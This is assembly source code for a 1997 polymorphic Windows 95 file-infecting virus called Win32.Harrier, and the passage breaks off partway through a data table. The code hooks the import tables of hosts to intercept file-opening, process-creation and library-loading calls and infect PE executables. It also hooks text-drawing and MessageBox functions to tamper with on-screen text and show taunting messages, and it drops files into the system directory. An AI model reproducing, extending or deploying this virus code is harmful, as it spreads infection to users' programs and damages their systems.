; Win32.Harrier
;		title	HDL - The pretty PE Polymorphic virus.
;		page	52,130
;
; *==================================================================*
; !  (c) 08-Sep-1997y  by  TechnoRat  "95-th Harrier from DarkLand"  !
; *==================================================================*
;
; Start coding: 27-Jul-1997y                           Ver 2.00a
; Still coding: 04-Sep-1997y                           Ver 2.01a
;  Stop coding: 08-Sep-1997y                           Ver 2.01a
;   Bug fixing: 10-Sep-1997y                           Ver 2.01b
;    Upgrading: 14-Sep-1997y                           Ver 2.01b
;   Bug fixing: 17-Sep-1997y                           Ver 2.01!
;
;
; Win32 Virus.    (c)*TR*SOFT  27-Jul-1997y
;
; Compatible: MS Windows 95 (v4.0+);
;  Structure: many levels polymorphic style;
;   Infector: written as Win32 console application;
;     Infect: all files by type NewExe (PE);
;      Check: attributes, date & time, IO errors, synchronization;
;      Devil: text strings on screen, message boxes, help,
;             Control Panel (System applet);
;       Lock: -=- nothing -=-
;       Code: pretty fucking style;
;
		.386				; Party goes to begin. . .
		.Model	Flat,StdCall
		%NoMacs
		Include	..HarrInc.Inc

; ---------------------------------------------------------
; Data section must be present. Data size must be non-zero.
		.Data
Dumbo		Db	'For fucking TASM32+TLINK32 programs!',0

; ---------------------------------------------------------
		.Code
		Public	StubEntryLabel		; Some definitions
		Public	StubImportPlace		; placed specially
		Public	ImagePlace		; for PELinker
		Public	CurrentPlace
		Public	FixUpsPlace
		Public	FixUpsCounter
		Public	ImportPlace
		Public	ImportLength
		Public	BufferPlace

; ---------------------------------------------------------
MaxPathLen	=	260

; ---------------------------------------------------------
Cr		Equ	<0Dh,0Ah>		; Service macroses
Ver		Equ	<'v2.01 '>
Release		Equ	<'Release (0) from 17-Sep-1997y '>
BasedOn		Equ	<'based on [AsmSwap engine v1.3]'>

; ---------------------------------------------------------
; Stack memory addressing macroses
MemCommitSz	=	38000h			; Stack memory size
TinyMemCommitSz	=	2000h			; WARNING! depends on
						; total program size.

_VarAddr	=	0			; Base of indexing
Var		Macro	VarName,VarType
&VarName	CatStr	<[>,%_VarAddr,<][EBp]>	; Defining the new
		If	Type VarType Eq 0	; variable reference
_VarAddr	=	_VarAddr+VarType
		Else
_VarAddr	=	_VarAddr+Type VarType
		EndIf
		EndM	Var

; ---------------------------------------------------------
; Binary include support
BFile		Macro	ILabel,IFileName,IFileSize
&ILabel		Label	Byte
_BFileStart	=	$
		Irpc	Char,IFileName
		Db	'&Char'
		EndM
		Db	(IFileSize-($-_BFileStart)) Dup(90h)
		EndM	BFile

; ---------------------------------------------------------
DebugModeKey	=	0h			; defining the Debug
		Irpc	Char,<CREATOR=TechnoRat> ; Mode switcher key
DebugModeKey	=	((DebugModeKey Xor '&Char')-1) Shl 1
		EndM

; ---------------------------------------------------------
_Jmp		Macro	Addr			; Macroses that supports
		Jmp	Addr			; AsmSwap scrambling
		EndM	_Jmp

_Nop		Macro	Addr
		EndM	_Nop

; ---------------------------------------------------------
; Here the start of running code.
Start:						; Here can be placed
						; the polymorphic decryptor,
						; And will be placed!
						; But later.
;StartCode
;Separator=_Jmp
; ---------------------------------------------------------
;Here the real virus body.

BodyHere:	PushA
		Cld				; Need after decrypting!
FirstCm:	Call	SecondCm
		Xor	EAx,EAx			; Some trash
		Ret				; will never work!!!

SecondCm:	Xor	EAx,EAx			; Some another trash
		Pop	EBx			; Real body. . .
		Sub	EBx,(Offset FirstCm - Offset Start + 5)
		Xor	EAx,EAx			; Wait on semaphore
WaitInit:	Xchg	EAx,[EBx][Offset InitOk - Offset Start]
		Or	EAx,EAx
		Jz	WaitInit
		Cmp	EAx,2h			; Ok, All done.
		Je	DoneInit
;DefCodeLine
		Db	0BEh
FixUpsPlace	Dd	?			; Mov ESi,xxxx
;BreakCodeLine
;DefCodeLine
		Db	0B9h
FixUpsCounter	Dd	?			; Mov ECx,xxxx
;BreakCodeLine
Again:		Mov	EDi,[EBx+ESi]
		Add	[EBx+EDi],EBx		; SetUp ReloItems
		Add	ESi,4h
		Dec	ECx
		Jnz	Again
		Mov	Here,EBx

		Mov	EAx,StubEntryLabel	; Calculate the
		Add	EAx,EBx			; Host entry point
		Sub	EAx,CurrentPlace	; and place it for future
		Sub	EAx,PolyMorphSz
		Mov	HostIP,EAx
		Sub	EBx,CurrentPlace
		Sub	EBx,PolyMorphSz
		Mov	MemBase,EBx

		Mov	Debug,0h		; Checking for debug
		Call	GetEnvironmentStringsA	; mode presence. . .
New_Key:	Xor	EBx,EBx
New_Char:	Cmp	Byte Ptr [EAx],0h	; Calculate hash from
		Je	Check_Key		; Env. string
		Xor	Bl,[EAx]
		Dec	EBx
		Shl	EBx,1
		Inc	EAx
		Jmp	New_Char
Check_Key:	Cmp	EBx,DebugModeKey	; Debug key detected?
		Jne	New_String
		Or	Debug,-1		; Yes!
		Push	0h			; (??? Not used)
		Call	MessageBeep
		Push	40h			; OkOnly+Information
		Push	Offset InfSelfHeader
		Push	Offset InfEnterDebug
		Push	0h
		Call	MessageBoxA
		Jmp	Break_Keys
New_String:	Inc	EAx			; No, next string
		Cmp	Byte Ptr [EAx],0h
		Jne	New_Key
Break_Keys:
		Mov	EAx,Offset KernelName	; SetUp import entries
		Mov	EDx,Offset KrnlImp	; on Kernel32 And Shell32
		Mov	ECx,KrnlImpCnt		; And ComDlg32 DLLs
		Call	SetUpImport
		Mov	EAx,Offset ShellName
		Mov	EDx,Offset ShellImp
		Mov	ECx,ShellImpCnt
		Call	SetUpImport
		Mov	EAx,Offset DialogName
		Mov	EDx,Offset DialogImp
		Mov	ECx,DialogImpCnt
		Call	SetUpImport
		Mov	EAx,Offset UserName	; and User32 and GDI32 DLLs
		Mov	EDx,Offset UserImp
		Mov	ECx,UserImpCnt
		Call	SetUpImport
		Mov	EAx,Offset GDIName
		Mov	EDx,Offset GDIImp
		Mov	ECx,GDIImpCnt
		Call	SetUpImport
		Mov	HelpCounter,0h
		Mov	wsRet$,0h		; Critical section end.

DoneInit:	Mov	InitOk,2h		; No Writes in RAM here!!!
; Here can be implemented some initialization features.
; for Example: infecting the Export in SHELL32.dll or
; in COMDLG32.dll; or infecting the Explorer.Exe or . . .

		Push	MemCommitSz/4h
		Call	AllocStackMem
		Lea	EAx,FT_Struc
		Push	EAx
		Call	GetSystemTime		; Get "Random" value
		Cmp	Word Ptr FT_Second,10h
		Jne	Go_Away
		Push	1000h			; OkOnly+SystemModal
		Push	Offset InfSelfHeader
		Push	Offset HelloMsg
		Push	0h
		Call	MessageBoxA		; Fuck the society ;-)

Go_Away:	Lea	EAx,PackedTime		; Initialize random generator
		Push	EAx			; Can be performed at
		Lea	EAx,FT_Struc		; any time, it is legal!!!
		Push	EAx
		Call	SystemTimeToFileTime
		Mov	EAx,PackedTime
		Or	EAx,1h
		Mov	RandSeed,EAx

		Mov	EAx,10h			; by 1/16 probability
		Call	Random
		Or	EAx,EAx
		Jnz	NoInstallOEM

		Push	MaxPathLen
		Lea	EAx,SomePath		; Some nice install ;-)
		Push	EAx			; (about the OEM)
		Call	GetSystemDirectoryA
		Push	EAx
		Lea	EAx,SomePath
		Add	EAx,[ESp]
		Mov	EDi,EAx			; The pretty LOGO file
		Mov	ESi,Offset BitMapName
		Cld
		Mov	ECx,BitMapNameL
		Rep	MovsB

		Push	0h
		Push	10000000h+80h		; FAN, FFRA
		Push	2h			; CA
		Push	0h
		Push	1h
		Push	80000000h+40000000h	; GR/GW
		Lea	EAx,SomePath
		Push	EAx
		Call	CreateFileA
		Cmp	EAx,-1h			; Create error!
		Je	Fail_OEM
		Push	EAx
		Push	0h
		Lea	ECx,ProcessedBytes
		Push	ECx
		Push	HarrBtMpFile_Sz
		Push	Offset BitMapFile
		Push	EAx
		Call	WriteFile
		Call	CloseHandle

		Lea	EAx,SomePath
		Add	EAx,[ESp]
		Mov	EDi,EAx			; The pretty INFO file
		Mov	ESi,Offset InfoName
		Mov	ECx,InfoNameL
		Rep	MovsB

		Push	0h
		Push	10000000h+80h		; FAN, FFRA
		Push	2h			; CA
		Push	0h
		Push	1h
		Push	80000000h+40000000h	; GR/GW
		Lea	EAx,SomePath
		Push	EAx
		Call	CreateFileA
		Cmp	EAx,-1h			; Create error!
		Je	Fail_OEM
		Push	EAx
		Push	0h
		Lea	ECx,ProcessedBytes
		Push	ECx
		Push	HarrInfoFile_Sz
		Push	Offset InfoFile
		Push	EAx
		Call	WriteFile
		Call	CloseHandle

Fail_OEM:	Pop	EAx

NoInstallOEM:	Push	MemCommitSz/4h
		Call	FreeStackMem
		PopA
		Jmp	HostIP			; All Done.

; ---------------------------------------------------------
SetUpImport:	Mov	EBx,StubImportPlace	; SetUp HostImport
		Add	EBx,Here
Set_3$:		Cmp	DWord Ptr [EBx][3*4],0h	; (EDx/ECx, EAx)
		Je	Set_0$			; Corrupt all. . .
		Mov	ESi,[EBx][3*4]		; Scan stub modules
		Add	ESi,MemBase
		Mov	EDi,EAx
		Cld
Set_2$:		Call	CmpUnCase		; Compare two module chars
		Jne	Set_1$
		Cmp	Byte Ptr [EDi][-1],0h
		Jne	Set_2$			; Names compared Ok.
		Call	Set_Mdl$		; SetUp current module.
Set_1$:		Add	EBx,5*4			; Next module. . .
		Jmp	Set_3$
Set_0$:		Ret				; Last module, All done.

Set_Mdl$:	Push	EAx
		Mov	ESi,[EBx]		; (Current Module in EBx)
		Or	ESi,ESi			; LookUp present?
		Jz	Set_Mdl_1$
		Add	ESi,MemBase
		Xor	EAx,EAx
Set_Mdl_0$:	Cmp	DWord Ptr [ESi],0h	; Last LookUp?
		Je	Set_Mdl_1$
		Test	DWord Ptr [ESi],80000000h
		Jne	Set_Mdl_2$		; Ordinal?
		Push	ESi
		Mov	ESi,[ESi]		; Get Name in module
		Add	ESi,MemBase
		Add	ESi,2h
		Push	EDx
		Push	ECx
Set_Mdl_M0$:	Push	ESi
		Mov	EDi,[EDx][1*4]		; Get self Name to SetUp
Set_Mdl_M2$:	Call	CmpUnCase
		Jne	Set_Mdl_M1$
		Cmp	Byte Ptr [EDi][-1],0h
		Jne	Set_Mdl_M2$		; Ok, SetUp this entry
		Mov	EDi,[EBx][4*4]		; Ptr to AddrTable
		Add	EDi,MemBase
		Mov	ESi,[EDi][EAx]		; ImportValue
		Push	EDi
		Mov	EDi,[EDx]		; SetUp _Var
		Mov	[EDi],ESi
		Pop	EDi
		Mov	ESi,[EDx][2*4]		; SetUp ImportValue
		Mov	[EDi][EAx],ESi		; by IProc
		Pop	ESi
		Jmp	Set_Mdl_M3$
Set_Mdl_M1$:	Pop	ESi
		Add	EDx,3*4			; Next name in list
		Dec	ECx
		Jnz	Set_Mdl_M0$
Set_Mdl_M3$:	Pop	ECx
		Pop	EDx
		Pop	ESi
Set_Mdl_2$:	Add	ESi,4			; Next name in module
		Add	EAx,4
		Jmp	Set_Mdl_0$
Set_Mdl_1$:	Pop	EAx
		Ret

CmpUnCase:	Push	EAx			; CmpsB (with UnCase check)
		LodsB
		Call	UpCase
		Mov	Ah,Al
		Xchg	ESi,EDi
		LodsB
		Call	UpCase
		Xchg	ESi,EDi
		Cmp	Ah,Al
		Pop	EAx
		Ret

UpCase:		Cmp	Al,'a'			; UpCase the Al register
		Jb	UpCase_0$
		Cmp	Al,'z'
		Ja	UpCase_0$
		Sub	Al,20h
UpCase_0$:	Ret

; ---------------------------------------------------------
; KERNEL32 infected functions realization.
ICreateFileA:	Push	EBp			; CreateFileA
		Mov	EBp,ESp			; opens or creates
		PushA				; the file or other
		Mov	EDx,[EBp][8]		; resource (pipe, device, etc)
		Mov	EBx,Offset NCreateFileA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_CreateFileA

IOpenFile:	Push	EBp			; OpenFile
		Mov	EBp,ESp			; opens or creates
		PushA				; the file
		Mov	EDx,[EBp][8]		; [Obsolete]
		Mov	EBx,Offset NOpenFile
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_OpenFile

IMoveFileA:	Push	EBp			; MoveFileA
		Mov	EBp,ESp			; moves or renames
		PushA				; the file
		Mov	EDx,[EBp][8]
		Mov	EBx,Offset NMoveFileA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_MoveFileA

IMoveFileExA:	Push	EBp			; MoveFileExA
		Mov	EBp,ESp			; moves or renames
		PushA				; the file
		Mov	EDx,[EBp][8]		; [Not supported by '95]
		Mov	EBx,Offset NMoveFileExA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_MoveFileExA

ICopyFileA:	Push	EBp			; CopyFileA
		Mov	EBp,ESp			; copyes
		PushA				; the file
		Mov	EDx,[EBp][8]
		Mov	EBx,Offset NCopyFileA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_CopyFileA

I_lopen:	Push	EBp			; _lopen
		Mov	EBp,ESp			; opens
		PushA				; the file
		Mov	EDx,[EBp][8]		; [Obsolete]
		Mov	EBx,Offset N_lopen
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	__lopen

IWinExec:	Push	EBp			; WinExec
		Mov	EBp,ESp			; spawns
		PushA				; the file
		Mov	EDx,[EBp][8]		; [Obsolete]
		Mov	EBx,Offset NWinExec
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_WinExec

ICreateProcessA:
		Push	EBp			; CreateProcessA
		Mov	EBp,ESp			; spawns
		PushA				; the file
		Mov	EDx,[EBp][8]
		Mov	EBx,Offset NCreateProcessA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_CreateProcessA

ILoadLibraryA:	Push	EBp			; LoadLibraryA
		Mov	EBp,ESp			; loads the
		PushA				; library file
		Mov	EDx,[EBp][8]
		Mov	EBx,Offset NLoadLibraryA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_LoadLibraryA

ILoadLibraryExA:
		Push	EBp			; LoadLibraryExA
		Mov	EBp,ESp			; loads the
		PushA				; library file
		Mov	EDx,[EBp][8]
		Mov	EBx,Offset NLoadLibraryExA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_LoadLibraryExA

IFindFirstFileA:
		Push	DWord Ptr [ESp][8]
		Push	DWord Ptr [ESp][8]
		Call	_FindFirstFileA
		Cmp	EAx,-1
		Je	FindFirst_1$
		Push	EBp			; FindFirstFileA
		Mov	EBp,ESp			; searches the
		PushA				; first file
		Mov	EDx,[EBp][0Ch]
		Add	EDx,0Bh*4
		Mov	EBx,Offset NFindFirstFileA
		Call	InfectByName
		PopA
		Pop	EBp
FindFirst_1$:	Ret	8h

IFindNextFileA:
		Push	DWord Ptr [ESp][8]
		Push	DWord Ptr [ESp][8]
		Call	_FindNextFileA
		Or	EAx,EAx
		Je	FindNext_1$
		Push	EBp			; FindNextFileA
		Mov	EBp,ESp			; searches the
		PushA				; next file
		Mov	EDx,[EBp][0Ch]
		Add	EDx,0Bh*4
		Mov	EBx,Offset NFindNextFileA
		Call	InfectByName
		PopA
		Pop	EBp
FindNext_1$:	Ret	8h

; ---------------------------------------------------------
; SHELL32 infected functions realization.
IShellExecuteA:	Push	EBp			; ShellExecuteA
		Mov	EBp,ESp			; opens or prints
		PushA				; the specified file
		Mov	EDx,[EBp][10h]		; via registry
		Mov	EBx,Offset NShellExecuteA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_ShellExecuteA

IShellExecuteEx:
		Push	EBp			; ShellExecuteEx
		Mov	EBp,ESp			; ???
		PushA				;
		Mov	EDx,[EBp][10h]		; [UnDocumented]
		Mov	EBx,Offset NShellExecuteEx
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_ShellExecuteEx

IShellExecuteExA:
		Push	EBp			; ShellExecuteExA
		Mov	EBp,ESp			; ???
		PushA				;
		Mov	EDx,[EBp][10h]		; [UnDocumented]
		Mov	EBx,Offset NShellExecuteExA
		Call	InfectByName
		PopA
		Pop	EBp
		Jmp	_ShellExecuteExA

IFindExecutableA:
		Push	EBp			; FindExecutableA
		Mov	EBp,ESp			; searches the
		PushA				; DDE server
		Mov	EDx,[EBp][8]		; via registry
		Mov	EBx,Offset NFindExecutableA
		Call	InfectByName		; or DDE requests
		PopA
		Pop	EBp
		Jmp	_FindExecutableA

; ---------------------------------------------------------
; COMDLG32 infected functions realization.
IGetOpenFileNameA:
		Push	DWord Ptr [ESp][4]	; GetOpenFileNameA
		Call	_GetOpenFileNameA	; returns the name
		Push	EBp			; of opening file
		Mov	EBp,ESp
		PushA
		Mov	EDx,[EBp][8]
		Mov	EDx,[EDx][7*4]
		Mov	EBx,Offset NGetOpenFileNameA
		Call	InfectByName
		PopA
		Pop	EBp
		Ret	4h

IGetSaveFileNameA:
		Push	DWord Ptr [ESp][4]	; GetSaveFileNameA
		Call	_GetSaveFileNameA	; returns the name
		Push	EBp			; of saving file
		Mov	EBp,ESp
		PushA
		Mov	EDx,[EBp][8]
		Mov	EDx,[EDx][7*4]
		Mov	EBx,Offset NGetSaveFileNameA
		Call	InfectByName
		PopA
		Pop	EBp
		Ret	4h

; ---------------------------------------------------------
; USER32 infected functions realization
IDrawTextA:	Push	EBx			; Draw text on screen
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][5*4+4]
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_DrawTextA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	5*4

IDrawTextExA:	Push	EBx			; Draw text on screen
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][6*4+4]
		Push	DWord Ptr [EBx][5*4+4]
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_DrawTextExA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	6*4

ITabbedTextOutA:
		Push	EBx			; Draw text on screen
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][8*4+4]
		Push	DWord Ptr [EBx][7*4+4]
		Push	DWord Ptr [EBx][6*4+4]
		Mov	ECx,[EBx][5*4+4]
		Mov	EDx,[EBx][4*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][3*4+4]
		Push	DWord Ptr [EBx][2*4+4]
		Push	DWord Ptr [EBx][1*4+4]
		Call	_TabbedTextOutA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	8*4

IwsprintfA:	Cmp	wsRet$,0h		; Check semaphore!
		Je	wsprintf_1$
		Jmp	_wsprintfA

wsprintf_1$:	Pop	wsRet$
		Push	Offset wsprint_0$
		Jmp	_wsprintfA		; Format text string
wsprint_0$:	Push	wsRet$
		Push	EBx
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Mov	EDx,[EBx][1*4+4]
		Mov	ECx,[EBx][-4]
		Call	ConvertStr
		Mov	[EBx][-4],ECx
		Mov	ESi,EDx
		Mov	EDi,[EBx][1*4+4]
		Cld
		Call	Transfer_Str
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Mov	wsRet$,0h
		Ret
wsRet$		Dd	0h

IwvsprintfA:	Push	EBx			; Format text string
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][3*4+4]
		Push	DWord Ptr [EBx][2*4+4]
		Push	DWord Ptr [EBx][1*4+4]
		Call	_wvsprintfA
		Mov	EDx,[EBx][1*4+4]
		Mov	ECx,EAx
		Call	ConvertStr
		Mov	[EBx][-4],ECx
		Mov	EDi,[EBx][1*4+4]
		Mov	ESi,EDx
		Cld
		Call	Transfer_Str
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx			; function result
		Pop	EBx
		Ret	3*4

IGetTabbedTextExtentA:
		Push	EBx			; Get text parameters
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][5*4+4]
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_GetTabbedTextExtentA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	5*4

IMessageBoxA:	Push	EBx			; Shows the some message
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	MemCommitSz/4h
		Call	AllocStackMem
		Lea	EAx,FT_Struc
		Push	EAx
		Call	GetSystemTime		; Get "Random" value
		Cmp	Word Ptr FT_Second,10h
		Jae	Message_None$
		MovZx	EAx,Word Ptr FT_Milliseconds
		Shr	EAx,1
		Xor	EDx,EDx
		Mov	ECx,FuckMsgCounter
		Div	ECx
		Shl	EDx,1
		Shl	EDx,1
		Add	EDx,Offset FuckMessages
		Mov	EDx,[EDx]
		Push	DWord Ptr [EBx][4*4+4]
		Push	DWord Ptr [EBx][3*4+4]
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	MessageBoxA
		Mov	[EBx][-4h],EAx
		Push	MemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	4*4

Message_None$:	Push	MemCommitSz/4h		; Legal call
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Jmp	_MessageBoxA

IWinHelpA:	PushA				; Calls the Windows
		Cmp	HelpCounter,10h		; help system
		Jb	WinHlp_0$
		Push	40h			; OkOnly+Information
		Push	Offset InfSelfHeader
		Push	Offset InfGodHelp
		Push	0h
		Call	MessageBoxA
		PopA
		Xor	EAx,EAx
		Ret	4*4

WinHlp_0$:	Inc	HelpCounter		; Legal call
		PopA
		Jmp	_WinHelpA

; ---------------------------------------------------------
; GDI32 infected functions realization
ITextOutA:	Push	EBx			; Draw text on screen
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Mov	ECx,[EBx][5*4+4]
		Mov	EDx,[EBx][4*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][3*4+4]
		Push	DWord Ptr [EBx][2*4+4]
		Push	DWord Ptr [EBx][1*4+4]
		Call	_TextOutA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	5*4

IExtTextOutA:	Push	EBx			; Draw text on screen
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][8*4+4]
		Mov	ECx,[EBx][7*4+4]
		Mov	EDx,[EBx][6*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][5*4+4]
		Push	DWord Ptr [EBx][4*4+4]
		Push	DWord Ptr [EBx][3*4+4]
		Push	DWord Ptr [EBx][2*4+4]
		Push	DWord Ptr [EBx][1*4+4]
		Call	_ExtTextOutA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	8*4

IGetTextExtentPointA:
		Push	EBx			; Get text parameters
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_GetTextExtentPointA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	4*4

IGetTextExtentPoint32A:
		Push	EBx			; Get text parameters
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_GetTextExtentPoint32A
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	4*4

IGetTextExtentExPointA:
		Push	EBx			; Get text parameters
		Mov	EBx,ESp
		Push	EAx
		PushA
		Push	TinyMemCommitSz/4h
		Call	AllocStackMem
		Push	DWord Ptr [EBx][7*4+4]
		Push	DWord Ptr [EBx][6*4+4]
		Push	DWord Ptr [EBx][5*4+4]
		Push	DWord Ptr [EBx][4*4+4]
		Mov	ECx,[EBx][3*4+4]
		Mov	EDx,[EBx][2*4+4]
		Call	ConvertStr
		Push	ECx
		Push	EDx
		Push	DWord Ptr [EBx][1*4+4]
		Call	_GetTextExtentExPointA
		Mov	[EBx][-4h],EAx
		Push	TinyMemCommitSz/4h
		Call	FreeStackMem
		PopA
		Pop	EAx
		Pop	EBx
		Ret	7*4

;Separator=_Nop
; ---------------------------------------------------------
ShellName	Db	'SHELL32.dll',0		; Name of import
KernelName	Db	'KERNEL32.dll',0	; providers
DialogName	Db	'COMDLG32.dll',0

UserName	Db	'USER32.dll',0
GDIName		Db	'GDI32.dll',0

; ---------------------------------------------------------
_CreateFileA	Dd	?			; Thunk pointers
_OpenFile	Dd	?			; (Kernel)
_MoveFileA	Dd	?
_MoveFileExA	Dd	?
_CopyFileA	Dd	?
__lopen		Dd	?
_WinExec	Dd	?
_CreateProcessA	Dd	?
_LoadLibraryA	Dd	?
_LoadLibraryExA	Dd	?
_FindFirstFileA	Dd	?
_FindNextFileA	Dd	?

_ShellExecuteA	Dd	?			; (Shell)
_ShellExecuteEx	Dd	?
_ShellExecuteExA Dd	?
_FindExecutableA Dd	?

_GetOpenFileNameA Dd	?			; (CommDlg)
_GetSaveFileNameA Dd	?

_DrawTextA	Dd	?			; (User)
_DrawTextExA	Dd	?
_TabbedTextOutA	Dd	?
_wsprintfA	Dd	?
_wvsprintfA	Dd	?
_GetTabbedTextExtentA Dd ?
_MessageBoxA	Dd	?
_WinHelpA	Dd	?

_TextOutA	Dd	?			; (GDI)
_ExtTextOutA	Dd	?
_GetTextExtentPointA Dd ?
_GetTextExtentPoint32A Dd ?
_GetTextExtentExPointA Dd ?

; ---------------------------------------------------------
NCreateFileA	Db	'CreateFileA',0		; Thunk pointer names
NOpenFile	Db	'OpenFile',0
NMoveFileA	Db	'MoveFileA',0
NMoveFileExA	Db	'MoveFileExA',0
NCopyFileA	Db	'CopyFileA',0
N_lopen		Db	'_lopen',0
NWinExec	Db	'WinExec',0
NCreateProcessA	Db	'CreateProcessA',0
NLoadLibraryA	Db	'LoadLibraryA',0
NLoadLibraryExA	Db	'LoadLibraryExA',0
NFindFirstFileA	Db	'FindFirstFileA',0
NFindNextFileA	Db	'FindNextFileA',0

NShellExecuteA	Db	'ShellExecuteA',0
NShellExecuteEx	Db	'ShellExecuteEx',0
NShellExecuteExA Db	'ShellExecuteExA',0
NFindExecutableA Db	'FindExecutable',0

NGetOpenFileNameA Db	'GetOpenFileNameA',0
NGetSaveFileNameA Db	'GetSaveFileNameA',0

NDrawTextA	Db	'DrawTextA',0
NDrawTextExA	Db	'DrawTextExA',0
NTabbedTextOutA	Db	'TabbedTextOutA',0
NwsprintfA	Db	'wsprintfA',0
NwvsprintfA	Db	'wvsprintfA',0
NGetTabbedTextExtentA Db 'GetTabbedTextExtentA',0
NMessageBoxA	Db	'MessageBoxA',0
NWinHelpA	Db	'WinHelpA',0

NTextOutA	Db	'TextOutA',0
NExtTextOutA	Db	'ExtTextOutA',0
NGetTextExtentPointA Db 'GetTextExtentPointA',0
NGetTextExtentPoint32A Db 'GetTextExtentPoint32A',0
NGetTextExtentExPointA Db 'GetTextExtentExPointA',0

; ---------------------------------------------------------
;DefCodeLine
KrnlImp		Label	DWord
		Dd	Offset _CreateFileA
		Dd	Offset NCreateFileA
		Dd	Offset ICreateFileA

		Dd	Offset _OpenFile
		Dd	Offset NOpenFile
		Dd	Offset IOpenFile

		Dd	Offset _MoveFileA
		Dd	Offset NMoveFileA
		Dd	Offset IMoveFIleA

		Dd	Offset _MoveFileExA
		Dd	Offset NMoveFileExA
		Dd	Offset IMoveFileExA

		Dd	Offset _CopyFileA
		Dd	Offset NCopyFileA
		Dd	Offset ICopyFileA

		Dd	Offset __lopen
		Dd	Offset N_lopen
		Dd	Offset I_lopen

		Dd	Offset _WinExec
		Dd	Offset NWinExec
		Dd	Offset IWinExec

		Dd	Offset _CreateProcessA
		Dd	Offset NCreateProcessA
		Dd	Offset ICreateProcessA

		Dd	Offset _LoadLibraryA
		Dd	Offset NLoadLibraryA
		Dd	Offset ILoadLibraryA

		Dd	Offset _LoadLibraryExA
		Dd	Offset NLoadLibraryExA
		Dd	Offset ILoadLibraryExA

		Dd	Offset _FindFirstFileA
